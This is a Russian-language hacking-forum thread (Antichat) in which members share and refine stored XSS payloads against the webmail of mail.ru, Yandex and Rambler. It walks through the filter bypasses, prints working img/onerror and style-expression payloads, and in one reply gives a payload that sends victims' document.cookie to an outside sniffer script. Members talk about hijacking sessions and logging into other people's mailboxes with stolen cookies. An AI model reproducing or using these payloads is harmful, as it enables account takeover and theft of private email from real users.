|
Активная XSS на mail.ru
Заранее прошу прощения у модераторов за дублирование темы, просто на мой взгляд в этом разделе следует выкладывать _готовые_ уязвимости, а не задавать вопросы по их поиску.
Антология XSS на mail.ru Не знаю, может кому пригодится, но эволюция фильтра на mail.ru протекала следующим образом. На момент моей регистрации на античате перестала действовать фишка. PHP код:
Следущая ошибка была найдена мной, помог мне Майор, она работала под IE, а я тестил под Оперой) Майор проверил под IE, я ему сперва даже не поверил) Брался fail.txt, в нем в наглую прописывалось: PHP код:
Следующим шагом стал пост уже не помню кого... =) Если напомните, то будет хорошо) XSS проходила благодаря двойному кодированию в ASCII слова javascript. При этом этаже бага была одновременно актуальна и для yandex.ru =) Выглядело это так: PHP код:
И тут снова Майор, умнейший человек) Я долго ругался когда он мне одному из первых поведал о собственном открытии) Всё было просто и изящно... Чтобы закрыть предыдущую багу, фильтр на Mail.ru стал до бесконечности раскодировать то что закодировано в ASCII... Тогда Майор половину слова javascript закодировал в ASCII и отдельно ещё раз зашифровал каждый символ &. А другую половину поставил через знак табуляции... И фильтр терялся... Выглядело это так: PHP код:
PHP код:
Конечно, может кто-то что-то и покруче нашел, что для всех браузеров применимо, но что я нашел тем и поделился. PS. Не забываем о приватности раздела и доверии друг другу. |
респект, проверим седня
|
Молоток плюсик те:)
|
сейчас потестим:):):)
|
ну вот=) в МОА только достойнейшие=)
|
Цитата:
А плюс щас поставим... |
Странно, у меня не работает, последние скобки заменяются на подмигивающий смайл.
Добавлено: Точно про разметку забыл, гост спасибо |
каким браузером тестил? хотя скорее всего ты разметку <html></html> не делал, да?
|
Ребята, всё работает, заходим в раздел E-mail->FAQ, скачиваем програмку XSSTester от LittleLamer, удаляем всё что там забито по дефолту и вставляем мой вариант, ничего не дописываем (никаких <html></html> не надо, их фильтр нещадно режет, вставляем одну единственную строчку - саму XSS). Забиваем информацию для отправки и отправляем. Идем проверяем, ещё раз напоминаю что актуально в таком виде только для IE (у меня IE6 SP2).
|
Кто-нибудь сформировал запрос, уже со сниффером, просто у меня не получается правильную структуру сделать.
|
Может что у меня sp1 один стоит поэтому косяки по идее нормально всё должно!
|
Dronga респект!!!
Цитата:
PHP код:
|
А я видео снял про XSS на yandex.ru смотрите в разделе видео.
|
Цитата:
Пантер, стуканись плз в аську, дело есть. |
саняХ поди такая же бага? ;)
а вообще не поленись - напиши еще, мне вот видео влом качать... |
Нет не такая воще её просек морф просто в гипер ссылки java скрипты воще не фильтруются втавляешь туда простой запрос чтобы куки пиздит и всё. Прошу добавить мне репутации =))
|
кстати бага дрона и на рамблере сработала!)
|
Цитата:
Принцип один и тот же. |
Аха точно всё работает прикольно почти на всех почтовых службах можно сесию угнать прикольно!!!
|
Цитата:
|
Цитата:
|
Хех дронга XSS не работает на yandex'e так что прикольно что нашёл на яндексе. Блин я так старался видео сделать что мне не кто не что не добавят. А воще я так и предполагал что гринам,модерам,админам,Мем ерам. Не будет это интересно потому что они самые умные =))
|
ахаха, джордан - гений, поставлю репу, если напишешь в форуме ну хотя б в этом разделе отдельный топик...
простейший hex-encoder: PHP код:
|
Вы своими XSS поломали оборудование на mail.ru =)))))))))))))
... Цитата:
|
ЛОЛ )))
А какими прогами лучше отправлять письмо в ХТМЛ? Ато через веб интерфейс низя на мыл.ру ((( |
XSS Tester неплохая прога - заюзай поиск по форуму...
+ а у меня нормально на мыло заходит... ну пока помучаем рамблер) |
Можешь с rambler.ru, можешь в ЗеБате (Параметры-Формат сообщения) или Оутлуке.
XSS Tester -> http://www.forum.antichat.ru/attachm...tachmentid=175 |
вот на мэйл.ру залезть с кукой - все понятно: или CookieEditor или AccessDiver...
- на рамблере блин в куке всего 1 значение показывает CookieEditor (ruid), когда приходит где-то 5... - через дайвер пробовал по рефереру зайти + кука - редиректит на rambler.ru |
Спасибо всем за старания товарищи, бага не актуальна. Сегодня её прикрыли. Месяц она жила, думаю многие неплохо погрелись на этом. Можно конечно выложить ещё одну и я бы сделал это если бы тут умели хранить секреты. Пальцем ни в кого не тыкаю, но не очень приятно когда ко мне в асю стучатся левые люди и показывают мне мою же Xss... Делаем выводы господа. Всем ещё раз спасибо.
|
Дронга, не отчаивайся друг. Все летает как по маслу! Админы mail.ru не такие умные люди. Щас катит всебраузеровый вариант:
PHP код:
|
Да помог то помог, только не мне, опять всё повторится... И помоему это не для всех браузеров, сейчас погляжу. Дело в img/src - эту конструкцию не все браузеры принимают, IE на ура, а вот остальные не примут вроде.
|
Решено спустить в общее.
Думаю, Всем будет интересно почитать историю лома mail.ru. Кстати, данные ХSS работают на других менее "продвинутых" почтовиках :) Удачных подвигов! Помните, данная информация предназначена только для ознакомления. Мы не рекомендуем Вам испытывать данные XSS-эксплоиты. Powered by Antichat.ru |
Наконец-то в паблике =) Сколько шуму было из этой темы. Как раз на момент её создания alsa основал АМА (пожалуй, самый закрытый на сегодня раздел) и я был первым кто в него зашел и первым моим постом в абсолютно пустом разделе стала усовершенствованная XSS. Так хотелось приписать "Первый нах!", ну вы понимаете, момент ведь исторический.
На открытие опять-таки навел Майор, он уже всё обыграв в голове и поняв просто спросил, почему работает это: Код HTML:
<font color="green>"style="font-size:1px;background:url\(java/**/script:alert('XSS by Dronga'))">Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>Фильтр терялся когда в атрибуте натыкался на закрывающий тег знак > и после него уже не смотрел.. А с точки зрения браузера всё что в кавычках - это атрибут. Поэтому генерилась ошибка и добавив обработчик onerror мы добивались своего =) Из МОА никто не догадался, хотя всё было у них перед глазами) Пусть теперь все видят и знают что и как обсуждается в закрытых разделах. Ну и конечно стремятся туда. Кстати, из всего этого материала рукой подать до ещё одной активной XSS, но только под IE (Greetz to ZaCo =) Удачи, господа) |
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')> ,подскажите пожалуйста,что надо вставлТь вместо xss ?
|
Вообще вот такая запись:
Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('XSS')>Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(1)>Отвечаю на вопрос: Код HTML:
<img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=document.images[0].src="http://www.link.com/script_sniffer.php?cooki="+document.cookie;> |
Огромное СПАСИБО!!!!
|
Честно говоря надоело через хсс, кто б че нового придумал гг
|
.....
Не могу понять почему не срабатывает...
Код HTML:
<img src=\"xss\" width=0 height=0 style=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\'xss\' document.cookie;this.sas=null\" alt=\'\'>Код HTML:
<img src=\"xss\" width=0 height=0 xstyle=\"top:expression(eval(this.sas));\" width=0 height=0 sas=\"this.src=\"xss\" document.cookie;this.sas=null\" alt=\"\"> |
А ты не заметил, что style отфильтровался и стал xstyle?? Поэтому и не работает.
|
Не пойму, но как это все провети? не пойму отправляю письмо в вижео хтмл с кодом? обоснуйте по полочкам, плз
|
| Время: 05:47 |